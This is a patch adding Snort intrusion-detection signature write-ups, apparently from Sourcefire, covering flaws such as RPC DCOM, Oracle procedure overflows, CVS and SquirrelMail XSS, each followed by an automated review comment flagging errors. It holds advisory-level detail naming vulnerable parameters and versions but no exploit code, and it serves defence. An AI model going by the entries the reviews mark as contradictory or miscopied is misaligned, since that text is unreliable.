+running with root privileges.
+
+--
+Ease of Attack:
+Simple.  An exploit is readily available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the available security patches from your vendor.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/133
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-1999-0006
+
+--
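Review bot: the CVE link is broken by a quoted-printable artifact, "name=3DCVE-1999-0006" should be "name=CVE-1999-0006". Vendor spelling is inconsistent too: "Qualcom" in Detailed Information versus "Qualcomm" in Affected Systems.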
--- /dev/null
+++ b/doc/signatures/3109.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3109
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
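Review bot: Affected Systems lists "Microsoft Windows Server 2000", which is not a product name; it should read "Microsoft Windows 2000 Server", and "Microsoft Windows NT Server" should carry its version. There is a stray blank line between "-- " and "Corrective Action:", the separators use "-- " with trailing whitespace, and Additional References is empty.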
--- /dev/null
+++ b/doc/signatures/2107.txt
@@ -0,0 +1,75 @@
+Rule:
+
+
+--
+Sid:
+2107
+
+--
+Summary:
+This event is generated when a remote user uses invalid data within an
+IMAP CREATE command sent to port 143 on an internal server. This may
+indicate an attempt to exploit a buffer overflow vulnerability in the
+IMAP CREATE command in the Alt-N MDaemon IMAP server. This vulnerability
+may affect other IMAP implementations.
+
+--
+Impact:
+Remote execution of arbitrary code, which could allow an attacker to
+interfere with or crash mail services. The attacker must have a valid
+IMAP account and be authenticated by the mail server to attempt this exploit.
+
+--
+Detailed Information:
+Some versions of the Alt-N MDaemon IMAP server contain a vulnerability
+where, if an authenticated user creates a folder with a sufficiently
+long name, arbitrary code can be executed with system privileges. Note
+that this exploit can only be attempted by an authenticated user with a
+valid IMAP account on the mail server.
+
+--
+Affected Systems:
+	Alt-N MDaemon 6.7.5 or Alt-N MDaemon 6.7.9 IMAP servers.
+
+--
+Attack Scenarios:
+An authenticated user can create a new folder with a sufficiently long
+name, creating a buffer overflow condition. The attacker can then
+execute arbitrary code with system privileges, which may allow the
+attacker to interfere with or crash mail services.
+
+--
+Ease of Attack:
+Exploits exist, but the user must be authenticated before attempting the exploit.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7446
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11577
+
+--
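Review bot: Affected Systems reads "Alt-N MDaemon 6.7.5 or Alt-N MDaemon 6.7.9 IMAP servers.", which should list both versions ("and") rather than offer a choice. The reference headings "Bugtraq" and "Nessus" lack the trailing colon used in the other files. Otherwise this is one of the more complete documents in the patch; the authentication precondition is stated consistently in Impact, Detailed Information and Ease of Attack.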
--- /dev/null
+++ b/doc/signatures/238.txt
@@ -0,0 +1,61 @@
+Rule:
+--
+Sid:
+238
+
+--
+Summary:
+This event is generated when a Tribe Flood Network (TFN) Distributed Denial of Service (DDoS) daemon responds to a client request to spawn a shell.
+
+--
+Impact:
+Attempted DDoS.  If the listed source IP is in your network, it may be a TFN daemon.  If the listed destination IP is in your network, it may be a TFN client.
+
+--
+Detailed Information:
+The TFN DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Clients communicate with daemons to inform them to launch attacks. A daemon will respond with a client request to spawn a shell with an ICMP echo reply with an ICMP identification number of 123, an ICMP sequence number of 0 and a string of "shell bound to port" in the payload.   
+
+--
+Affected Systems:
+Any TFN compromised host.
+
+--
+Attack Scenarios:
+After a host becomes a TFN daemon, it will respond to client requests.
+
+--
+Ease of Attack:
+Simple. TFN code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+Arachnids:
+http://www.whitehats.com/info/IDS182
+
+--
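Review bot: Detailed Information has the direction of the exchange backwards: "A daemon will respond with a client request to spawn a shell with an ICMP echo reply" should read "respond to a client request ... with an ICMP echo reply", otherwise the identification number 123 and sequence 0 appear to belong to the request rather than the reply the rule matches. Formatting: the blank line after "Rule:" is missing and the Detailed Information line has trailing spaces.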
--- /dev/null
+++ b/doc/signatures/100000709.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000709
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "SquirrelMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "mailbox" parameter in the "search.php" script used by the "SquirrelMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using SquirrelMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
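Review bot: the Impact and the second Detailed Information paragraph do not describe a cross site scripting issue. "Possible execution of arbitrary code of the attackers choosing" and "execute system binaries" are server-side consequences, whereas the Attack Scenarios paragraph correctly describes a malicious link that steals information from the user who clicks it; reword Impact and that paragraph to describe the effect on the user's browser session, and fix "attackers" to "attacker's". Formatting: the file opens with two blank lines, and the "--" separators after the Sid, after Affected Systems and after Contributors lack the blank line used everywhere else in this patch. Additional References cites only the generic XSS FAQ; a pointer to the SquirrelMail advisory for the "mailbox" parameter in search.php, with affected versions, would let operators confirm exposure.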
--- /dev/null
+++ b/doc/signatures/2059.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2059
+
+--
+Summary:
+MsmMask.exe
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Versions of MondoSearch prior to 4.4.5156 use a vulnerable version of a 
+cgi script named msmmask.exe. This script allows the attacker to view 
+the source of any file in a webservers root directory.
+
+vulnerabilities using the security scanner nessus.
+
+--
+Affected Systems:
+MondoSearch versions prior to 4.4.5156.
+
+--
+Attack Scenarios:
+The attacker needs to access the msmmask.exe script and request a file 
+in the servers web directory.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade the application to at least version 4.4.5156 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11163
+
+--
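Review bot: Detailed Information contains an orphaned fragment, "vulnerabilities using the security scanner nessus.", which is the tail of a sentence whose beginning is missing; either restore the sentence or drop the fragment (the Nessus plugin link in Additional References already covers that point). The Summary is just the filename "MsmMask.exe" and should state what the event means, e.g. that a request for the MondoSearch msmmask.exe script was observed. Minor: "webservers root directory" and "servers web directory" need possessive apostrophes, and Corrective Action reads "at least version 4.4.5156 or higher", which says the same thing twice.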
--- /dev/null
+++ b/doc/signatures/2734.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2734
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_mview_propagation
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
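Review bot: a stray line break splits the final Detailed Information sentence so that ". This procedure is included in" begins a line; join it so it reads "vulnerability in the procedure alter_mview_propagation. This procedure is included in dbms_repcat." Affected Systems reads "Oracle Oracle9i" with the vendor name doubled. The "Rule: ", "Sid: " and several "-- " lines carry trailing whitespace. Corrective Action ("Apply the appropriate vendor supplied patch") lacks a terminating period and Additional References is empty for what is described as a known vulnerability; an Oracle alert or CVE reference would let operators confirm patch status.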
--- /dev/null
+++ b/doc/signatures/100000456.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000456
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "SSPwiz" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "message" parameter in the "index.cfm" script 
+used by the "SSPwiz" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using SSPwiz
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
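Review bot: Impact claims "Possible execution of arbitrary code of the attackers choosing" and Detailed Information claims the attacker may "execute system binaries", neither of which is a consequence of a cross site scripting flaw in the "message" parameter of index.cfm; Attack Scenarios has it right (a malicious link that steals information from the user who clicks it). Reword those two paragraphs accordingly and fix "attackers" to "attacker's". The "--" after the Sid, after Affected Systems and after Contributors is missing the blank line used elsewhere in this patch, and Additional References gives only the generic XSS FAQ rather than anything specific to SSPwiz.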
--- /dev/null
+++ b/doc/signatures/2011.txt
@@ -0,0 +1,96 @@
+Rule:
+
+--
+Sid:
+2011
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development. It is possible for a remote
+attacker to exploit a bug in the cvs daemon that will allow the 
+perpetrator the ability to execute code, issue a denial of service, 
+compromise code being stored in CVS and read sensitive information. 
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources on the machine. Software development could 
+be halted, code could be lost or stolen and code auditing after the fact
+could affect delivery of software.
+
+--
+Detailed Information:
+Specially crafted directory requests can be used to exploit a double 
+free memory reference bug in the CVS software. It is possible to force 
+the CVS daemon to execute an error that returns a pointer to already 
+freed memory. This is a well known bug. This rule indicates a request 
+for a directory using invalid syntax.
+
+Since cvsd may be run as root via inetd, the compromise will present the
+attacker with root privileges on the machine. Any code the attacker is 
+able to execute will have root privileges.
+
+It is also possible for the attacker to bypass all write checks and be 
+able to write to the repository using the "anonymous" or "anoncvs" 
+accounts commonly used for read only access. The source code may then be
+compromised by the attacker who could choose to insert malicious code of
+his own making.
+
+If the CVS password database is writable by the CVS user the result is a
+remote root compromise.
+
+For CVS daemons running under changed root conditions (chroot), the rest
+of the operating system files may be protected but the entire CVS 
+directory structure is vulnerable.
+
+--
+Affected Systems:
+	CVS versions 1.11.4 and earlier
+	
+--
+Attack Scenarios:
+The attacker could pass a specially crafted directory request to trigger
+an error condition. The attacker may then be presented with the 
+opportunity to execute code or issue shell commands on some systems.
+
+--
+Ease of Attack:
+Simple, an exploit is available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+Connections to the server using zlib compression will not generate this
+event.
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous cvs access to the server.
+
+Update the CVS software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+www.cert.org/advisories/CA-2003-02.html
+www.kb.cert.org/vuls/id/650937
+
+CVE Entry
+CAN-2003-0015
+
+--
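Review bot: the Corrective Action steps read as contradictory: the first sentence says to disable the CVS daemon in /etc/inetd.conf and the next says to run the CVS daemon as a non-root user, without saying that the second replaces the first (stop launching it as root from inetd and run it under a dedicated unprivileged account instead); rephrase so the two read as one sequence. In Additional References the CERT URLs lack the "http://" scheme used by every other entry in this patch, and the CVE reference is a bare "CAN-2003-0015" rather than the cve.mitre.org URL form used elsewhere; make both consistent. The False Negatives note that sessions using zlib compression do not generate this event is operationally important and worth repeating in the Summary.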
--- /dev/null
+++ b/doc/signatures/100000710.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000710
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Xoops MyAds Module" application running on a webserver. Access to the file "annonces-p-f.php" with SQL commands being passed as the "lid" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "lid" parameter in the "annonces-p-f.php" script used by the "Xoops MyAds Module" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Xoops MyAds Module
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
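Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials...") is boilerplate about credential validation that does not apply to SQL injection via the "lid" parameter of annonces-p-f.php and contradicts the first paragraph's description of the event; drop it. It also carries the typo "ona". Fix "attackers choosing" to "attacker's choosing". Formatting: the file begins with two blank lines, and the "--" separators after the Sid, after Affected Systems and after Contributors lack the blank line used elsewhere.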
--- /dev/null
+++ b/doc/signatures/3074.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3074
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"subscribe" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
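Review bot: Attack Scenarios reads "An attacker can supplied an overly long command", which should be "can supply". The Summary phrase "associated with the several commands of an IMAP service" is ungrammatical; since the second Detailed Information paragraph names Mercury Mail as the vulnerable implementation and this Sid covers the "subscribe" command, say that directly. Additional References is empty even though Affected Systems lists exact product versions (Mercury Mail Transport System 3.32 and 4.01a); add the vendor advisory or CVE. Minor: "Brian Caswell<bmc@sourcefire.com>" is missing a space before the address.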
--- /dev/null
+++ b/doc/signatures/2897.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2897
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_site_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
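Review bot: a line break splits the final Detailed Information sentence so that ". This procedure is included in" begins a line; rejoin it as "vulnerability in the procedure drop_site_priority. This procedure is included in sys.dbms_repcat_conf." Affected Systems has the doubled vendor name "Oracle Oracle9i", the "Rule: ", "Sid: " and several "-- " lines carry trailing whitespace, Corrective Action lacks a terminating period, and Additional References is empty for a vulnerability the Summary calls known.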
--- /dev/null
+++ b/doc/signatures/2575.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2575
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
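Review bot: the entry never identifies which PHP application or vulnerability Sid 2575 matches: Summary says only "a PHP web application", Affected Systems says "All systems running PHP applications", and Additional References is empty, so an analyst receiving this event has nothing to confirm against; name the script or parameter the rule inspects and add a reference. "running ona web server" in Detailed Information should be "on a web server". Formatting: the line "relationships between the victim server and other hosts can be exploited by the attacker." runs well past the wrap width used for the rest of the paragraph.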
--- /dev/null
+++ b/doc/signatures/3179.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3179
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
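Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share.") contradicts Detailed Information, which describes malformed data sent via RPC to the DCOM service; the scenario text appears to have been copied from a different rule and should describe a malformed RPC request instead. "Expoit code exists" in Ease of Attack should be "Exploit code exists". Additional References is empty; the Microsoft bulletin and CVE for this RPC DCOM issue would let operators map the five listed Windows versions to a patch.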
--- /dev/null
+++ b/doc/signatures/1922.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1922
+
+--
+Summary:
+This event is generated when an attempt is made to forward a Remote Procedure Call (RPC) request through the portmapper service.
+
+--
+Impact:
+Information disclosure.  This can detect and request RPC services offered.
+
+--
+Detailed Information:
+The RPC "callit" procedure allows the portmapper to act as a proxy to forward requests to other RPC services offered by the host. This allows an attacker to call an RPC service on the same host without knowing the port number associated with the RPC service.    
+
+--
+Affected Systems:
+All hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can use the portmapper proxy to circumvent any required authentication when sending requests to the actual port associated with an RPC service.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+According to RFC 1057, this proxy feature supports broadcasts to RPC services using the well-known portmapper port.  Legitimate hosts may attempt to use the proxy feature.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+RFC:
+http://www.ietf.org/rfc/rfc1057.txt
+
+
+--
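Review bot: Impact reads "Information disclosure. This can detect and request RPC services offered.", which is garbled; it should say that an attacker can reach RPC services offered by the host without knowing their ports, matching Detailed Information. The False Positives note (RFC 1057 broadcast use of the proxy by legitimate hosts) should be reflected in Corrective Action, since "Filter RPC ports at the firewall" will also block that legitimate use. Minor: the Detailed Information line ends in trailing whitespace, and there are two blank lines before the closing "--" where other entries use one.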
--- /dev/null
+++ b/doc/signatures/454.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+454
+
+--
+Summary:
+This event is generated when an ICMP Timestamp request is made with an invalid or undefined ICMP Code.
+
+--
+Impact:
+Information gathering.  An ICMP Timestamp request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP Timestamp request is used by the ping command to elicit an ICMP Timestamp reply from a listening live host.  This rule alerts on a generic ICMP request where no payload is included in the message or the payload does not match more specific rules. 
+
+If ICMP type 8 (echo) traffic is filtered at a firewall, an attacker may try to use type 13 (timestamp) as an alternative.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP Timestamp request may be used to legitimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP Timestamp requests.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Additional information by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+
+--
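Review bot: the Summary and Detailed Information describe two different rules. The Summary says the event fires on "an ICMP Timestamp request ... with an invalid or undefined ICMP Code", while Detailed Information says the rule "alerts on a generic ICMP request where no payload is included in the message or the payload does not match more specific rules" and attributes the request to the ping command, which the next paragraph itself distinguishes from type 13 timestamp traffic (it names type 8 echo as the ping case). Rewrite Detailed Information to say which ICMP code values on a type 13 message the rule treats as invalid. Corrective Action ("Block inbound ICMP Timestamp requests.") should be qualified by the False Positives note that timestamp requests are used for legitimate troubleshooting. Minor: "Steven Alexander<alexander.s@mccd.edu>" is missing a space before the address, and Additional References consists of two empty lines.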
--- /dev/null
+++ b/doc/signatures/2162.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2162
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
